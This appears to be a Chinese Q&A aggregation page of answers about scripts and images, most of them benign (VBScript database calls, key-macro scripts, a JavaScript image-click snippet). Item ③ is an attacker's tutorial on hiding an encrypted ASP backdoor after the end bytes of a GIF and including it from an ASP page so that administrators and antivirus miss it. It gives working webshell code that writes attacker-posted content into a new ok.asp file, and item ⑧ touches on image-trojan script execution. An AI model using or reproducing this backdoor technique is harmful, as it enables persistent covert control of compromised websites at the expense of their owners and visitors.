① vb脚本怎么在脚本中插入图片
用vbscript是可以调用sql语句的,这时你需要用vbs的ADODB对象
例如:
Setsqlconn=Server.CreateObject("ADODB.Connection")
ConnectString="DRIVER=;SERVER="&Session("Server")&";DATABASE="&Session("base")&_
";uid="&Session("Uid")&";pwd="&Session("Pswd")
SqlConn.OpenConnectString
SqlString="SELECTCOUNT(VEND_CD)"+_
"FROMT_SAMP_MATE"+_
"WHEREVEND_CD='"&strVENDCD&"'"+_
"ANDRECD_DATE>='"&strRECDDATESTA&"'"+_
SetCHKRsIbe=SqlConn.Execute(SqlString)
*****************************************
首先,你说的网页使用VB脚本应该是VBScript,而不是VB。另外也可以用VB而不是VBScript,但那时候就更复杂,需要用VB编写IE的插件等形式了。
其次,网页使用VB脚本又分成两种情况,1.服务器端运行,这就是通常所说的ASP技术,嵌入在ASP网页文件中的<%%>标记之内。2.客户端运行,这就使常用的网页脚本技术,嵌入在HTML网页文件中的<scriptlanguage="VBScript"type="text/VBScript"></script>标记之内。
从你的情况来看,你应该使用服务器端脚本技术,即ASP技术。其中涉及很多问题,最好买本书看,要不在网上看看VBScript教程,这里三两句说不清楚的。
② 按键精灵可以在一个脚本里多次使用寻找图片和操作么
你想写连个脚本和在一起的?
你可以这样弄 把两个脚本弄合并在一起
然后找到这个图后按键盘 启动另一个脚本的热键 N
③ 图片内加入脚本
现在从注入拿WEBSHELL看来成功率都比较高了。拿到SHELL后,安装自己的脚本后门,常常被查杀。 脚本后门的发展史:
1。最开始就是直接放一个ASP文件上去。
2。把ASP文件加密才放上去。
3。把脚本插入到代码中去。(我经常用这种) 不过一样被查得出来,我前段时候手工检测一个站的脚本安全。发现这个站被种了21个木马。所以我就想到了,怎么样才能不被发现不能被查杀。 最后我研究了一下如果把脚本插入到图片中。然后在ASP中调用图片中的脚本程序应该就可以了。 测试的时候通过了。现在我把我的心德写一下。让大家来分析一下。共同进步和完善这种方法。 在研究过程中我看了GIF图片的结构文档方面的书。 GIF图片都是以 00 3B 为结束的。换句话说00 3B 后面的不会显示出来。所以我们在00 3B后面插入代码就行了。当然代码我们加密放到图片中去效果更好。我写了一个程序来这么做。 这里要说一下,在图片中00 3B后面的是不会显示出来的。 但其中的代码已经运行了。图片也会正常显示出来。 测试:
在图片后面加入:<%=now%>
然后在一个ASP文件中加入:<!--#include file="aaa.gif" --> 然后你们下载这个图片,发现图片最后面变成了时间。很正常因为图片放到了ASP脚本中运行了其中的代码。 换句话来说,如果写的是一段生成文件的脚本。那么我们提交特定的参数让图片中的代码去生成文件。这样就实现了我们的后门。 1:这种方法要做的工作就是在目标站点中找一张GIF图片然后把代码插入到图片中,再上传到站点中去。这样作管理员很难找到木马在哪里。打死也想不到木马在图片中。 2:我们插入的代码只有一行就是那个include file .....
找个文件大点的ASP文件给插进去就行了。 然后我们在本地POST数据提交给ASP引用图片的URL这样就完成了工作。 我的插入图片的脚本: <% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% fdata = request("cyfddata") %>
<% if fdata<>"" then %>
<% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"\ok.asp"%>
<% Set objCountFile=objFSO.CreateTextFile(syfdapth,True) %>
<% objCountFile.Write fdata %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %> 这段代码主要就是在当前目录下生成一个ok.asp文件。
文件内容是由我们提交的数据.用request("cyfddata")来获取的。 这段代码加密后插入到图片中去。下面我把我程序的代码贴出来。 本地自己构建一个提交表单向ASP文件提交(加入图片那个文件) 表单文本框输入内容名称是:cyfddata 后感:
我本人认为这种方法,管理员很难查到。这是我两天前想到的作出来了,可能有些问题希望和大家一起讨论,必竞,为了追求技术就得研究技术。
共享知识,从而升华。
感觉去研究一些新东西,人活得更XS些。
④ 使用按键精灵我写的脚本为什么没找到图片还是会运行点击,我写脚本意思是先找到第一张图片(找到为真),找到
1 if后面一概是if intx>=109 inty>=103 变量不对应下面就出现你的问题了
2 MoveTo intX,intY移动到if intx>=109 inty>=103 先判断再动作
2 我不知道你是玩什么游戏 图片是点击一次就消失的么 如果是可以了 如果不是你的脚本这样写只能找到第一个图片
⑤ 如何把JS类脚本或CMD命令插入图片中
电脑,按F8进入安全模式,再用杀毒软件查杀.
360安全卫士,清除
如果还是清除不了,你可以在资源管理器的工具-文件夹选项-勾选显示所有文件和文件夹
然后到相应路径找到该文件
⑥ 如何将可执行文件(如:*.bat)隐藏在图片文件中
直接打开图片就执行bat目前实现不了,如果存在就是系统漏洞,微软就会打补丁了。
你想打开图片就执行bat,我只能在对方运行你程序的前提下实现,而且不排除会被杀软拦截。看你要不要了……
LS的那位我只能呵呵了……
⑦ 需要一个js脚本,实现打开图片功能
最好不要使用替换的方式
使用JS 点击打开方式会比较好
imglist=document.getElementsByTagName("IMG")
for(var i=0;i<imglist.length;i++){
o=imglist[i]
o.onclick=window.open(this.src);
o.style.cursor="pointer";
}
/*
javascript:document.getElementsByTagName("IMG")[0].getAttribute("src")
*/
⑧ 在图片中插入JS脚本上传到网站上,会被执行吗
如果服务端 没做 上传文件 的安全 处理 该文件 里的JS脚本会在用户访问该图片文件时被执行, 这是经典的图片木马技术中的一种 而已!
⑨ 脚本能做好一个自动保存图片吗
这个看具体情况,反正有些可以,部分不太信,因为存在一些影响,